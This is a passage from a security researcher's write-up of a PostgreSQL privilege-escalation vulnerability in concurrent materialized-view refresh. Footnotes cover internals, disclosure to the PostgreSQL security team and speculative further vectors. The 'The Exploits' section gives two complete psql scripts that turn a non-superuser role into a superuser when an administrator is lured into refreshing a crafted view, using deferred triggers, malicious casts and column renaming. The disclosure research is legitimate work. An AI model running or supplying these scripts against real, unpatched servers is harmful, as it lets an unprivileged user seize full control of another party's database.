The second issue is little trickier. The docs on ALTER TABLE say I can change a column’s type provided that existing entries can be converted to the new type by an implicit cast, but attempting to do so will give me an error:

ERROR: cannot ALTER TABLE "pg_temp_41205" because it is being used by active queries in this session

The solution is actually pretty simple: Even though I can’t change the type of a column for a given a name, I can change the name of a column for a given type. Rather than changing the type directly, I’ll just shuffle around the column names so that the name the code generates no longer refers to the column it expected, but instead a different column with a different type.

Finally, there’s a bit of wonkiness here with IMMUTABLE functions. In short, I need to lie to the planner in order in order to create a CAST function that can actually perform an INSERT. You can see the full exploit below, but here are the parts that differ from the version with CREATE RULE:

-- Create a custom type with a cast that inserts into `t1`.
CREATE TYPE etyp AS ENUM ( 'e' );
CREATE FUNCTION wrap_insert(INTEGER) RETURNS INTEGER LANGUAGE sql AS 
    $$ INSERT INTO t1 VALUES ($1) RETURNING $1; $$ ;
CREATE FUNCTION evil(etyp) RETURNS INTEGER LANGUAGE sql AS
    $$ SELECT wrap_insert(1); $$ IMMUTABLE ;
CREATE CAST (etyp AS INTEGER) WITH FUNCTION evil(etyp) AS IMPLICIT ;

-- Populate the materialized view with a function that swaps column names on the temp table.
CREATE FUNCTION swap() RETURNS INTEGER AS $$
DECLARE
    target TEXT := get_target();
BEGIN
    IF to_regclass(target) IS NOT NULL THEN
      EXECUTE format('ALTER TABLE %s RENAME COLUMN i TO x', target);
      EXECUTE format('ALTER TABLE %s RENAME COLUMN e TO i', target);
      EXECUTE format('ALTER TABLE %s RENAME COLUMN x TO e', target);
    END IF;
    RETURN 1; 
END
$$ LANGUAGE plpgsql;

CREATE MATERIALIZED VIEW mv AS SELECT swap() AS i, 'e'::etyp as e ;
CREATE UNIQUE INDEX ix_mv_i ON mv (i);

The Exploits

Below are simplified versions of the exploits, executable using psql.

Using CREATE RULE

This version uses CREATE RULE to convert the table to a view and hence only works in unpatched versions <=15:

-- Setup a non-superuser role and database.
CREATE ROLE r0 LOGIN ;
CREATE DATABASE rdb OWNER r0;
\c rdb r0

-- Set up the privilege escalation via a deferred trigger.
CREATE FUNCTION pwn() RETURNS trigger AS $$
BEGIN
    IF current_setting('is_superuser') THEN
        RAISE WARNING '-- user % --', current_user;
        ALTER USER r0 SUPERUSER;
    END IF;
    DROP VIEW IF EXISTS remove_later;
    RETURN NEW;
END $$ LANGUAGE plpgsql;

CREATE TABLE t1(i INTEGER);
CREATE CONSTRAINT TRIGGER trig 
    AFTER INSERT ON t1
    INITIALLY DEFERRED
    FOR EACH ROW EXECUTE PROCEDURE pwn();

-- Get the (expected) name of the target temp table.
CREATE FUNCTION get_target() RETURNS TEXT AS $$
    SELECT format('%I.%I',
      pg_my_temp_schema()::regnamespace,
      'pg_temp_' || 'mv'::text::regclass::oid
    );
$$ LANGUAGE SQL STABLE ;

-- Convert the temp table to a view and rename the ctid column.
CREATE FUNCTION conv() RETURNS SETOF INTEGER AS $$
DECLARE
    target TEXT := get_target(); 
BEGIN
    -- Only run during a refresh, not the initial build.
    IF to_regclass(target) IS NOT NULL THEN
        EXECUTE format('CREATE RULE "_RETURN" AS ON SELECT TO %s DO INSTEAD SELECT attack() AS i, 1 as x', target);
        EXECUTE format('ALTER VIEW %s RENAME COLUMN x TO ctid', target);
    END IF;
    RETURN; 
END $$ LANGUAGE plpgsql;

-- Defer the trigger function to run on commit. 
CREATE FUNCTION attack() RETURNS INTEGER AS $$
DECLARE
  target TEXT := get_target();
BEGIN
    BEGIN 
        INSERT INTO t1 VALUES (1);
        EXECUTE format('ALTER VIEW %s RENAME TO remove_later', target);
        EXECUTE format('CREATE TEMP TABLE %s()', target);
    EXCEPTION WHEN OTHERS THEN -- do nothing
    END;
    RETURN 2;
END $$ LANGUAGE plpgsql;

CREATE MATERIALIZED VIEW mv AS SELECT conv() AS i, 1 AS x;
CREATE UNIQUE INDEX ix_mv_i ON mv (i);

\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;

Using ALTER TABLE

This version uses ALTER TABLE to trick the REFRESH into executing a CAST function and works in all unpatched versions:

-- Setup a non-superuser role and database.
CREATE ROLE r0 LOGIN ;
CREATE DATABASE rdb OWNER r0;
\c rdb r0

-- Set up the privilege escalation via a deferred trigger.
CREATE FUNCTION pwn() RETURNS trigger AS $$
BEGIN
    IF current_setting('is_superuser') THEN
        RAISE WARNING '-- user % --', current_user;
        ALTER USER r0 SUPERUSER;
    END IF;
    RETURN NEW;
END $$ LANGUAGE plpgsql;

CREATE TABLE t1(i INTEGER);
CREATE CONSTRAINT TRIGGER trig 
    AFTER INSERT ON t1
    INITIALLY DEFERRED
    FOR EACH ROW EXECUTE PROCEDURE pwn();

-- Get the (expected) name of the target temp table.
CREATE FUNCTION get_target() RETURNS TEXT AS $$
    SELECT format('%I.%I',
      pg_my_temp_schema()::regnamespace,
      'pg_temp_' || 'mv'::text::regclass::oid
    );
$$ LANGUAGE SQL STABLE ;

-- Create a custom type with a cast that inserts into `t1`.
CREATE TYPE etyp AS ENUM ( 'e' );
CREATE FUNCTION wrap_insert(INTEGER) RETURNS INTEGER LANGUAGE sql AS 
    $$ INSERT INTO t1 VALUES ($1) RETURNING $1; $$ ;
CREATE FUNCTION evil(etyp) RETURNS INTEGER LANGUAGE sql AS
    $$ SELECT wrap_insert(1); $$ IMMUTABLE ;
CREATE CAST (etyp AS INTEGER) WITH FUNCTION evil(etyp) AS IMPLICIT ;

-- Populate the materialized view with a function that swaps column names on the temp table.
CREATE FUNCTION swap() RETURNS INTEGER AS $$
DECLARE
    target TEXT := get_target();
BEGIN
    IF to_regclass(target) IS NOT NULL THEN
      EXECUTE format('ALTER TABLE %s RENAME COLUMN i TO x', target);
      EXECUTE format('ALTER TABLE %s RENAME COLUMN e TO i', target);
      EXECUTE format('ALTER TABLE %s RENAME COLUMN x TO e', target);
    END IF;
    RETURN 1; 
END
$$ LANGUAGE plpgsql;

CREATE MATERIALIZED VIEW mv AS SELECT swap() AS i, 'e'::etyp as e ;
CREATE UNIQUE INDEX ix_mv_i ON mv (i);

\c rdb postgres
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;

Footnotes

  1. In the message for the commit that fixes this vulnerability, the author writes “[As] far as I know this is only exploitable in v15 and below. That’s a fiddly assumption though, so apply this patch to master and all stable versions.” The original notice from Postgres’s website stated “The only known exploit does not work in PostgreSQL 16 and later. For defense in depth, PostgreSQL 16.2 adds the protections that older branches are using to fix their vulnerability.”

    After discovering an attack that does work in v16.1 and below, and prior to publishing this article, I notified the PostgreSQL security team. They have since updated the notices.return

  2. Though this is mainly an implementation detail, the reason REFRESH blocks concurrent readers is that the backend is swapping the physical files that store the results of the prior and current execution of the query. Like other table-rewrite commands (e.g., TRUNCATE, CLUSTER, many forms of ALTER TABLE), using REFRESH MATERIALIZED VIEW without CONCURRENTLY takes an ACCESS EXCLUSIVE lock on the table. Using CONCURRENTLY avoids this restriction by modifying the original table instead.return

  3. While in the SRO sandbox, we won’t be able to so any of these:

    • SET or RESET
    • DISCARD (session state, e.g. temp tables, cached query plans, etc.)
    • CREATE TEMP (anything)
    • CREATE CURSOR .. WITH HOLD
    • CLOSE (a cursor)
    • PREPARE (a statement or transaction)
    • DEALLOCATE (a prepared statement)
    • LISTEN (for a notification)
    • UNLISTEN
    return

  4. An OID is an object identifier used internally. The reg* type aliases enable conversion to and from OIDs and strings representations, so 'mv'::regclass finds the integer identifier for the relation 'mv', using the typical name resolution rules. If that’s used in a string context Postgres converts it to the name, so 'foo_' || 'bar'::regclass would probably result in 'foo_bar'. You can cast the reg* alias to oid to get the actual integer so 'foo_' || 'bar'::regclass::oid might yield 'foo_1234'.

    In a function declaration, Postgres resolves those aliases immediately, uses them to track dependencies, and will give an error if the reference doesn’t exist yet. To use a run-time lookup instead, you have to start with an explicit cast to text, hence the seemingly round-about expression 'mv'::text::regclass::oid — it says “at run-time, find the relation 'mv' and return its OID”.return

  5. You can’t normally do INSERT or DELETE on a materialized view, but the code in backend/executor/execMain.c checks the value of MatViewIncrementalMaintenanceIsEnabled(), which the materialized view code arranges to return TRUE by calling OpenMatViewIncrementalMaintenance() just before the updates.return

  6. Since the patched code only drops SRO for CREATE TEMP TABLE ${diffname} (tid pg_catalog.tid), as far as I can tell, a successful attack today could only work via an event trigger. You have to be a superuser to create one, but it might be a viable attack vector if by chance your administrator in such a way that you can run some code of your own.

    There might be a vector via a SQL injection attack. The diffname is literally just tempname with _2 appended, and you can rename tempRel before it looks the name up. The code that generates the SQL looks like this:

    tempRel = table_open(tempOid, NoLock);
    tempname = quote_qualified_identifier(get_namespace_name(RelationGetNamespace(tempRel)),
                                          RelationGetRelationName(tempRel));
    diffname = make_temptable_name_n(tempname, 2);
    /* ... */
    resetStringInfo(&querybuf);
    appendStringInfo(&querybuf, "CREATE TEMP TABLE %s (tid pg_catalog.tid)", diffname);
    

    Unfortunately for an attacker, tempname is quoted, so although it’s easy to give it a name that breaks assumptions of this code, exploiting it would require somehow bypassing the parser. Maybe that could be done with some sort of character set trickery, but… probably not. Even if it’s possible, you’d almost certainly need to be a superuser to set it up, and either way, it would likely have broader attack implications.return

  7. It’s worth pointing out that the successful attack requires luring the target victim into explicitly executing REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker’s materialized view. Take another look at the part that attempts to leave SRO:

    SetUserIdAndSecContext(relowner, save_sec_context | SECURITY_LOCAL_USERID_CHANGE);
    

    If you’re already in SRO mode when it makes that call, the save_sec_context will still have the SRO bit set, and the CREATE TEMP TABLE will fail. That means if you get a victim to run some code that tries to sneak in a concurrent refresh, either it won’t work (because you were already sandboxed), or you could have just called your attack code directly (because you weren’t sandboxed).return

  8. The commit that removed it called it a “kludge” to let pg_dump break circular dependencies in views.return

  9. When I first went through all this, I ended up adding a second index to the matview to call another function when the REFRESH reached that final INSERT step. There, I drop the view and replace it with a regular table, but since the name the code uses is qualified with the temporary schema, and the index function runs in SRO mode, I can’t create a temporary table then. Instead, I had to first create a temp table with an arbitrary name from the attack function running outside SRO mode, and then within the index function I could drop the view and rename the temp table in its place. Through all that pain, I realized I can just rename the view even though it’s being used in the query.return

  10. There might be a way to pull off the exploit using an operator after all, but it’s pretty convoluted and would make use of the same trickery as the CAST version; in my testing, I couldn’t get around some errors from the planner when it hits the FULL JOIN, so I’m not sure it’s even possible.

    If you can install a “trusted” extension, e.g. hstore, it can add operators into a schema where you have CREATE privileges. If you can create a btree index naming a column of its type, the generated SQL for the equality comparison either won’t schema-qualify the operator (if you put the extension in the public schema) or will qualify it with one you specified with CREATE EXTENSION.

    In either case, you can define your own operator in that schema, which for now I’ll call s. The REFRESH code will intend to use the operator in s that was added by the extension, and generate something like newdata.col OPERATOR(s.=) mv.col. You can create an operator in s that names the extension type on the right and some custom type on the left, so if you pull off the same column swap as for CAST, it should choose your operator instead.

    I played with the various operator attributes (COMMUTATOR, MERGES, etc.) to try to get around the planner errors, but I didn’t find a working solution.return